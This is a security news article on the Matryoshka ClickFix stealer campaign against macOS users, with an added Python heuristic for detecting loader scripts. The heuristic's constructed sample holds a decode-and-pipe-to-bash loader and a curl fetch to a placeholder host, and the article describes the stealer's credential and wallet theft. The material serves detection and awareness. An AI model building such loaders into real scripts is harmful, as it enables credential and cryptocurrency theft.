Advanced Matryoshka Malware Targets macOS Users with Sophisticated Social Engineering Techniques

A sophisticated social engineering campaign targeting macOS users has emerged, deploying a dangerous stealer malware through an evolved version of the ClickFix attack technique. Named Matryoshka after the Russian nesting dolls, this variant uses nested obfuscation layers to hide malicious code from security scanners and automated analysis systems. The attack tricks victims into executing Terminal commands that appear to be legitimate software fixes, bypassing traditional download-and-launch security expectations that many users rely on.

The campaign leverages typosquatting domains to intercept users who mistype legitimate website addresses, particularly targeting visitors attempting to reach software review sites. Once redirected to the fraudulent domain, victims encounter a fake installation prompt instructing them to paste a fix command into their macOS Terminal application. Intego analysts identified this attack chain after observing typosquatted domains like comparisions[.]org, which mimics the legitimate comparisons.org website by adding an extra letter.

Unlike earlier ClickFix variants that used readable scripts, Matryoshka employs layered evasion techniques designed to complicate detection. The malicious payload remains encoded and compressed until execution, unpacking only in memory rather than being written to disk as a clean script file. This significantly reduces visibility for file-based security scanning and makes basic static analysis more challenging for researchers.

After successful execution, the loader retrieves an AppleScript payload specifically designed to harvest browser credentials and target cryptocurrency wallet applications including Trezor Suite and Ledger Live. The malware attempts programmatic credential theft first, then falls back to displaying fake system dialogs that repeatedly request passwords until victims comply.

Infection Mechanism and Evasion Tactics

The Matryoshka infection chain operates through multiple stages, each designed to evade detection while maintaining operational efficiency. When victims paste the malicious Terminal command, it retrieves a shell script containing a large encoded payload hidden within a heredoc structure. This payload passes through an in-memory pipeline where it undergoes decoding and decompression without creating easily detectable file artifacts.

The loader demonstrates several evasion behaviors that help it run unnoticed. It detaches its main routine into the background and exits quickly, so the Terminal prompt returns almost immediately and victims believe the process has finished. The script redirects standard input, output, and error streams to suppress visible artifacts in the terminal session. Additionally, the command-and-control infrastructure requires specific custom headers in requests and responds with generic errors to automated scanners that do not send them.
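As an added example (not from Intego's report or the original article), the following Python heuristic flags shell scripts that combine the loader traits described above: a heredoc carrying a large encoded blob, an in-memory decode/decompress pipeline feeding an interpreter, backgrounding with stream suppression, and a download step that sets a custom header. Both sample scripts are constructed; the header name and URL are placeholders.

```python
from __future__ import annotations
import re

# Each regex corresponds to one loader trait described in the article.
INDICATORS = {
    "heredoc_blob": re.compile(r"<<-?\s*['\"]?\w+['\"]?\n(?:[A-Za-z0-9+/=]{40,}\n){3,}"),
    "decode_pipeline": re.compile(r"base64\s+(-d|--decode)\s*\|\s*(gunzip|gzip\s+-d|xz\s+-d|zcat|bzip2\s+-d)"),
    "eval_from_pipe": re.compile(r"\|\s*(bash|sh|zsh|eval|osascript)\b"),
    "background_detach": re.compile(r"(?<![&|])&\s*$", re.M),   # trailing lone '&', not '&&' or '2>&1'
    "stream_suppression": re.compile(r"</dev/null|>\s*/dev/null\s+2>&1|2>/dev/null"),
    "custom_header_fetch": re.compile(r"\bcurl\b[^\n]*\s-H\s+['\"][A-Za-z-]+:"),
}


def score_script(text: str) -> list[str]:
    """Return the sorted names of loader indicators present in a shell script."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def is_suspicious(text: str, threshold: int = 3) -> bool:
    """A single redirect or pipe is normal; several loader traits together are not."""
    return len(score_script(text)) >= threshold


# Constructed sample in the shape the article describes. The blob is filler
# (base64 of repeated "AAAA") and decodes to nothing useful.
BLOB = "\n".join(["QUFB" * 19] * 3)
SUSPICIOUS = f"""#!/bin/bash
( payload=$(cat <<'EOF'
{BLOB}
EOF
)
echo "$payload" | base64 -d | gunzip | bash
curl -s -H 'X-Client-Token: PLACEHOLDER' "https://example.invalid/fix" ) </dev/null >/dev/null 2>&1 &
"""

# Constructed benign installer snippet: one quiet redirect, nothing else.
BENIGN = """#!/bin/bash
set -e
brew update >/dev/null 2>&1
brew install --cask some-app
"""

if __name__ == "__main__":
    for label, script in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, is_suspicious(script), score_script(script))
```

Point the scoring function at Terminal-initiated scripts captured by endpoint telemetry; the threshold is deliberately conservative so that a lone `2>&1` does not page anyone.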

Users should never paste commands from websites into Terminal, as legitimate software updates will not require this action. Organizations should block typosquatting domains, monitor Terminal-initiated execution patterns, and watch for suspicious staging archives or wallet application tampering.

This campaign underscores the evolving sophistication of social engineering attacks targeting macOS users. By leveraging typosquatting and advanced obfuscation techniques, attackers can effectively bypass traditional security measures and exploit user trust. It is crucial for users to remain vigilant and adhere to best practices, such as verifying website URLs, avoiding the execution of unsolicited commands, and keeping software up to date.

In conclusion, the Matryoshka variant of the ClickFix attack represents a significant threat to macOS users, combining deceptive social engineering tactics with advanced evasion techniques to deploy stealer malware. Awareness and proactive security measures are essential to mitigate the risks associated with this and similar campaigns.